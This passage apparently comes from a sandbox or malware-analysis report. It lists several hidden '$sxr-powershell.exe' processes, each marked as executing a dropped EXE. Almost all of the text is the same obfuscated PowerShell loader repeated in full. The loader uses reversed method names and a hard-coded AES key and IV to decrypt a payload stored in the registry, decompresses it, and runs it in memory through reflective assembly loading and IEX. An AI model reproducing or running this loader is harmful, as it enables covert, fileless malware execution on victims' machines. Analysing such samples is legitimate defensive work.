'')('iTx/W/jnzoHE14r8DEibMEyuaeYiE3dAqeSv8NW3jSN5A97h+1KY+THryvIh1dJiGmsnJ//SXLVPWbfMRzL7ufXSCGPz+pfVsuxaLTSyptiJPzqcoan9Xr1jE4Rmc5u7LTId80wSaXqLNmoB4fPg/P7NE3c2Yuw0nqWt/ZngWniFYubjYtKMqyyNRSfNgyr89Ug/vFc6LgfL0bPIYeBlHCze7nx8PsBL+Q/EBybHWqUfBjNVsJmx3EeYrFfxNdSC3e8Y+JBmg8TSGLJHyBt+tFwMt/TmHxps75m66JuQeZLlhKeLZ6bjJ74zTvsp2A8buoYwDETvErAcvrBSGhVS7mYWy6o4J4BMWokYyeV+Cq7Q8/73SCovtE69+hmKy7HRlFzPuhkQyPHRSeQjZ9+873yj/eogIwSIkiXGB0fk3+g=');$XVVPy = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVVPy, 0, $XVVPy.Length);$XVVPy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVVPy);$ZnwOj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l578nKfyTb6bpNlYfElbzQ==');$ZnwOj = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZnwOj, 0, $ZnwOj.Length);$ZnwOj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZnwOj);$cOnuq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1OZ44W6bdY1aa1QLUX4fJA==');$cOnuq = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cOnuq, 0, $cOnuq.Length);$cOnuq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cOnuq);$gBBaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KPGj8zPRDGjW+cttrplwtg==');$gBBaw = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gBBaw, 0, $gBBaw.Length);$gBBaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gBBaw);$HVXKt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wg3LvN/Da8EBkYu0PdZp+A==');$HVXKt = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HVXKt, 0, $HVXKt.Length);$HVXKt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HVXKt);$ewjne = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bahh8RYkzn28RHBrHTR6Rw==');$ewjne = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ewjne, 0, $ewjne.Length);$ewjne = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ewjne);$UswSE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7ps7mtx52AURDUYRcez/RA==');$UswSE0 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE0, 0, $UswSE0.Length);$UswSE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE0);$UswSE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c5XC748b+iFBdBWdnZ4s2w==');$UswSE1 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE1, 0, $UswSE1.Length);$UswSE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE1);$UswSE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eJLAPTei3F5Fj8pfHCkW0A==');$UswSE2 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE2, 0, $UswSE2.Length);$UswSE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE2);$UswSE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7VMq7slMB5TL9zlr2duzSA==');$UswSE3 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE3, 0, $UswSE3.Length);$UswSE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE3);$cXkwu.Dispose();$OeLLh1.Dispose();$vDMJP = [Microsoft.Win32.Registry]::$HVXKt.$gBBaw($UswSE).$cOnuq($Dsgcn);$ZyJrD=[string[]]$vDMJP.Split('\');$pKkNV=XSkGH(CzXOR([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[1])));BdfTq $pKkNV (,[string[]] ('%*'));$quBDS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[0]);$OeLLh = New-Object System.Security.Cryptography.AesManaged;$OeLLh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$CdjJU = $OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')();$quBDS = $CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($quBDS, 0, $quBDS.Length);$CdjJU.Dispose();$OeLLh.Dispose();$YMVfV = New-Object System.IO.MemoryStream(, $quBDS);$HPwhP = New-Object System.IO.MemoryStream;$LnniF = New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::$UswSE1);$LnniF.$ewjne($HPwhP);$LnniF.Dispose();$YMVfV.Dispose();$HPwhP.Dispose();$quBDS = $HPwhP.ToArray();$xnpKq = $XVVPy | IEX;$ZLyfJ = $xnpKq::$UswSE2($quBDS);$xoyvm = $ZLyfJ.EntryPoint;$xoyvm.$UswSE0($null, (, [string[]] ($WtQaE)))
        6⤵
        Executes dropped EXE
        
        PID:5340
      - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5912).WaitForExit();[System.Threading.Thread]::Sleep(5000); function CzXOR($wCmAa){ $OeLLh=[System.Security.Cryptography.Aes]::Create(); $OeLLh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $OeLLh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $OeLLh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U='); $OeLLh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q=='); $CdjJU=$OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')(); $ZrPpX=$CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wCmAa, 0, $wCmAa.Length); $CdjJU.Dispose(); $OeLLh.Dispose(); $ZrPpX;}function XSkGH($wCmAa){ $YMVfV=New-Object System.IO.MemoryStream(,$wCmAa); $HPwhP=New-Object System.IO.MemoryStream; $LnniF=New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::Decompress); $LnniF.CopyTo($HPwhP); $LnniF.Dispose(); $YMVfV.Dispose(); $HPwhP.Dispose(); $HPwhP.ToArray();}function BdfTq($wCmAa,$IUdXm){ $ZLyfJ=[System.Reflection.Assembly]::Load([byte[]]$wCmAa); $xoyvm=$ZLyfJ.EntryPoint; $xoyvm.Invoke($null, $IUdXm);}$OeLLh1 = New-Object System.Security.Cryptography.AesManaged;$OeLLh1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$cXkwu = $OeLLh1.('rotpyrceDetaerC'[-1..-15] -join '')();$UswSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('18zwi26zozI/4sNwvOJxpg==');$UswSE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE, 0, $UswSE.Length);$UswSE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE);$Dsgcn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkARJ6Rv6BIg2MogoHYcmw/X0/TgnV5+LWpTmFkicv4=');$Dsgcn = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Dsgcn, 0, $Dsgcn.Length);$Dsgcn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Dsgcn);$WtQaE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CPgoovSvydwIKAVbsV0oUg==');$WtQaE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WtQaE, 0, $WtQaE.Length);$WtQaE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WtQaE);$XVVPy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iTx/W/jnzoHE14r8DEibMEyuaeYiE3dAqeSv8NW3jSN5A97h+1KY+THryvIh1dJiGmsnJ//SXLVPWbfMRzL7ufXSCGPz+pfVsuxaLTSyptiJPzqcoan9Xr1jE4Rmc5u7LTId80wSaXqLNmoB4fPg/P7NE3c2Yuw0nqWt/ZngWniFYubjYtKMqyyNRSfNgyr89Ug/vFc6LgfL0bPIYeBlHCze7nx8PsBL+Q/EBybHWqUfBjNVsJmx3EeYrFfxNdSC3e8Y+JBmg8TSGLJHyBt+tFwMt/TmHxps75m66JuQeZLlhKeLZ6bjJ74zTvsp2A8buoYwDETvErAcvrBSGhVS7mYWy6o4J4BMWokYyeV+Cq7Q8/73SCovtE69+hmKy7HRlFzPuhkQyPHRSeQjZ9+873yj/eogIwSIkiXGB0fk3+g=');$XVVPy = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVVPy, 0, $XVVPy.Length);$XVVPy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVVPy);$ZnwOj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l578nKfyTb6bpNlYfElbzQ==');$ZnwOj = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZnwOj, 0, $ZnwOj.Length);$ZnwOj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZnwOj);$cOnuq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1OZ44W6bdY1aa1QLUX4fJA==');$cOnuq = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cOnuq, 0, $cOnuq.Length);$cOnuq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cOnuq);$gBBaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KPGj8zPRDGjW+cttrplwtg==');$gBBaw = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gBBaw, 0, $gBBaw.Length);$gBBaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gBBaw);$HVXKt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wg3LvN/Da8EBkYu0PdZp+A==');$HVXKt = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HVXKt, 0, $HVXKt.Length);$HVXKt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HVXKt);$ewjne = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bahh8RYkzn28RHBrHTR6Rw==');$ewjne = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ewjne, 0, $ewjne.Length);$ewjne = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ewjne);$UswSE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7ps7mtx52AURDUYRcez/RA==');$UswSE0 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE0, 0, $UswSE0.Length);$UswSE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE0);$UswSE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c5XC748b+iFBdBWdnZ4s2w==');$UswSE1 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE1, 0, $UswSE1.Length);$UswSE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE1);$UswSE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eJLAPTei3F5Fj8pfHCkW0A==');$UswSE2 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE2, 0, $UswSE2.Length);$UswSE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE2);$UswSE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7VMq7slMB5TL9zlr2duzSA==');$UswSE3 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE3, 0, $UswSE3.Length);$UswSE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE3);$cXkwu.Dispose();$OeLLh1.Dispose();$vDMJP = [Microsoft.Win32.Registry]::$HVXKt.$gBBaw($UswSE).$cOnuq($Dsgcn);$ZyJrD=[string[]]$vDMJP.Split('\');$pKkNV=XSkGH(CzXOR([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[1])));BdfTq $pKkNV (,[string[]] ('%*'));$quBDS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[0]);$OeLLh = New-Object System.Security.Cryptography.AesManaged;$OeLLh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$CdjJU = $OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')();$quBDS = $CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($quBDS, 0, $quBDS.Length);$CdjJU.Dispose();$OeLLh.Dispose();$YMVfV = New-Object System.IO.MemoryStream(, $quBDS);$HPwhP = New-Object System.IO.MemoryStream;$LnniF = New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::$UswSE1);$LnniF.$ewjne($HPwhP);$LnniF.Dispose();$YMVfV.Dispose();$HPwhP.Dispose();$quBDS = $HPwhP.ToArray();$xnpKq = $XVVPy | IEX;$ZLyfJ = $xnpKq::$UswSE2($quBDS);$xoyvm = $ZLyfJ.EntryPoint;$xoyvm.$UswSE0($null, (, [string[]] ($WtQaE)))
        6⤵
        Executes dropped EXE
        
        PID:768
      - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5912).WaitForExit();[System.Threading.Thread]::Sleep(5000); function CzXOR($wCmAa){ $OeLLh=[System.Security.Cryptography.Aes]::Create(); $OeLLh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $OeLLh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $OeLLh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U='); $OeLLh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q=='); $CdjJU=$OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')(); $ZrPpX=$CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wCmAa, 0, $wCmAa.Length); $CdjJU.Dispose(); $OeLLh.Dispose(); $ZrPpX;}function XSkGH($wCmAa){ $YMVfV=New-Object System.IO.MemoryStream(,$wCmAa); $HPwhP=New-Object System.IO.MemoryStream; $LnniF=New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::Decompress); $LnniF.CopyTo($HPwhP); $LnniF.Dispose(); $YMVfV.Dispose(); $HPwhP.Dispose(); $HPwhP.ToArray();}function BdfTq($wCmAa,$IUdXm){ $ZLyfJ=[System.Reflection.Assembly]::Load([byte[]]$wCmAa); $xoyvm=$ZLyfJ.EntryPoint; $xoyvm.Invoke($null, $IUdXm);}$OeLLh1 = New-Object System.Security.Cryptography.AesManaged;$OeLLh1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$cXkwu = $OeLLh1.('rotpyrceDetaerC'[-1..-15] -join '')();$UswSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('18zwi26zozI/4sNwvOJxpg==');$UswSE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE, 0, $UswSE.Length);$UswSE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE);$Dsgcn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkARJ6Rv6BIg2MogoHYcmw/X0/TgnV5+LWpTmFkicv4=');$Dsgcn = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Dsgcn, 0, $Dsgcn.Length);$Dsgcn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Dsgcn);$WtQaE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CPgoovSvydwIKAVbsV0oUg==');$WtQaE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WtQaE, 0, $WtQaE.Length);$WtQaE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WtQaE);$XVVPy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('iTx/W/jnzoHE14r8DEibMEyuaeYiE3dAqeSv8NW3jSN5A97h+1KY+THryvIh1dJiGmsnJ//SXLVPWbfMRzL7ufXSCGPz+pfVsuxaLTSyptiJPzqcoan9Xr1jE4Rmc5u7LTId80wSaXqLNmoB4fPg/P7NE3c2Yuw0nqWt/ZngWniFYubjYtKMqyyNRSfNgyr89Ug/vFc6LgfL0bPIYeBlHCze7nx8PsBL+Q/EBybHWqUfBjNVsJmx3EeYrFfxNdSC3e8Y+JBmg8TSGLJHyBt+tFwMt/TmHxps75m66JuQeZLlhKeLZ6bjJ74zTvsp2A8buoYwDETvErAcvrBSGhVS7mYWy6o4J4BMWokYyeV+Cq7Q8/73SCovtE69+hmKy7HRlFzPuhkQyPHRSeQjZ9+873yj/eogIwSIkiXGB0fk3+g=');$XVVPy = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($XVVPy, 0, $XVVPy.Length);$XVVPy = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($XVVPy);$ZnwOj = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('l578nKfyTb6bpNlYfElbzQ==');$ZnwOj = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ZnwOj, 0, $ZnwOj.Length);$ZnwOj = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ZnwOj);$cOnuq = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('1OZ44W6bdY1aa1QLUX4fJA==');$cOnuq = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($cOnuq, 0, $cOnuq.Length);$cOnuq = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($cOnuq);$gBBaw = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('KPGj8zPRDGjW+cttrplwtg==');$gBBaw = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($gBBaw, 0, $gBBaw.Length);$gBBaw = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($gBBaw);$HVXKt = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('wg3LvN/Da8EBkYu0PdZp+A==');$HVXKt = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($HVXKt, 0, $HVXKt.Length);$HVXKt = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($HVXKt);$ewjne = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('bahh8RYkzn28RHBrHTR6Rw==');$ewjne = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($ewjne, 0, $ewjne.Length);$ewjne = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($ewjne);$UswSE0 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7ps7mtx52AURDUYRcez/RA==');$UswSE0 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE0, 0, $UswSE0.Length);$UswSE0 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE0);$UswSE1 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('c5XC748b+iFBdBWdnZ4s2w==');$UswSE1 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE1, 0, $UswSE1.Length);$UswSE1 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE1);$UswSE2 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('eJLAPTei3F5Fj8pfHCkW0A==');$UswSE2 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE2, 0, $UswSE2.Length);$UswSE2 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE2);$UswSE3 = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('7VMq7slMB5TL9zlr2duzSA==');$UswSE3 = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE3, 0, $UswSE3.Length);$UswSE3 = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE3);$cXkwu.Dispose();$OeLLh1.Dispose();$vDMJP = [Microsoft.Win32.Registry]::$HVXKt.$gBBaw($UswSE).$cOnuq($Dsgcn);$ZyJrD=[string[]]$vDMJP.Split('\');$pKkNV=XSkGH(CzXOR([System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[1])));BdfTq $pKkNV (,[string[]] ('%*'));$quBDS = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')($ZyJrD[0]);$OeLLh = New-Object System.Security.Cryptography.AesManaged;$OeLLh.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$CdjJU = $OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')();$quBDS = $CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($quBDS, 0, $quBDS.Length);$CdjJU.Dispose();$OeLLh.Dispose();$YMVfV = New-Object System.IO.MemoryStream(, $quBDS);$HPwhP = New-Object System.IO.MemoryStream;$LnniF = New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::$UswSE1);$LnniF.$ewjne($HPwhP);$LnniF.Dispose();$YMVfV.Dispose();$HPwhP.Dispose();$quBDS = $HPwhP.ToArray();$xnpKq = $XVVPy | IEX;$ZLyfJ = $xnpKq::$UswSE2($quBDS);$xoyvm = $ZLyfJ.EntryPoint;$xoyvm.$UswSE0($null, (, [string[]] ($WtQaE)))
        6⤵
        Executes dropped EXE
        
        PID:6220
      - C:\Windows\$sxr-powershell.exe
        
        "C:\Windows\$sxr-powershell.exe" -NoLogo -NoProfile -Noninteractive -WindowStyle hidden -ExecutionPolicy bypass -Command [System.Diagnostics.Process]::GetProcessById(5912).WaitForExit();[System.Threading.Thread]::Sleep(5000); function CzXOR($wCmAa){ $OeLLh=[System.Security.Cryptography.Aes]::Create(); $OeLLh.Mode=[System.Security.Cryptography.CipherMode]::CBC; $OeLLh.Padding=[System.Security.Cryptography.PaddingMode]::PKCS7; $OeLLh.Key=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U='); $OeLLh.IV=[System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q=='); $CdjJU=$OeLLh.('rotpyrceDetaerC'[-1..-15] -join '')(); $ZrPpX=$CdjJU.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($wCmAa, 0, $wCmAa.Length); $CdjJU.Dispose(); $OeLLh.Dispose(); $ZrPpX;}function XSkGH($wCmAa){ $YMVfV=New-Object System.IO.MemoryStream(,$wCmAa); $HPwhP=New-Object System.IO.MemoryStream; $LnniF=New-Object System.IO.Compression.GZipStream($YMVfV, [IO.Compression.CompressionMode]::Decompress); $LnniF.CopyTo($HPwhP); $LnniF.Dispose(); $YMVfV.Dispose(); $HPwhP.Dispose(); $HPwhP.ToArray();}function BdfTq($wCmAa,$IUdXm){ $ZLyfJ=[System.Reflection.Assembly]::Load([byte[]]$wCmAa); $xoyvm=$ZLyfJ.EntryPoint; $xoyvm.Invoke($null, $IUdXm);}$OeLLh1 = New-Object System.Security.Cryptography.AesManaged;$OeLLh1.Mode = [System.Security.Cryptography.CipherMode]::CBC;$OeLLh1.Padding = [System.Security.Cryptography.PaddingMode]::PKCS7;$OeLLh1.Key = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('swD/g0ddwufYKX/qihDrldk6m+EvFku6CpuKgW+L79U=');$OeLLh1.IV = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('hO/TaNK/xjmsS/krRQP/2Q==');$cXkwu = $OeLLh1.('rotpyrceDetaerC'[-1..-15] -join '')();$UswSE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('18zwi26zozI/4sNwvOJxpg==');$UswSE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($UswSE, 0, $UswSE.Length);$UswSE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($UswSE);$Dsgcn = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('EkARJ6Rv6BIg2MogoHYcmw/X0/TgnV5+LWpTmFkicv4=');$Dsgcn = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($Dsgcn, 0, $Dsgcn.Length);$Dsgcn = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($Dsgcn);$WtQaE = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join '')('CPgoovSvydwIKAVbsV0oUg==');$WtQaE = $cXkwu.('kcolBlaniFmrofsnarT'[-1..-19] -join '')($WtQaE, 0, $WtQaE.Length);$WtQaE = [System.Text.Encoding]::('8FTU'[-1..-4] -join '').('gnirtSteG'[-1..-9] -join '')($WtQaE);$XVVPy = [System.Convert]::('gnirtS46esaBmorF'[-1..-16] -join 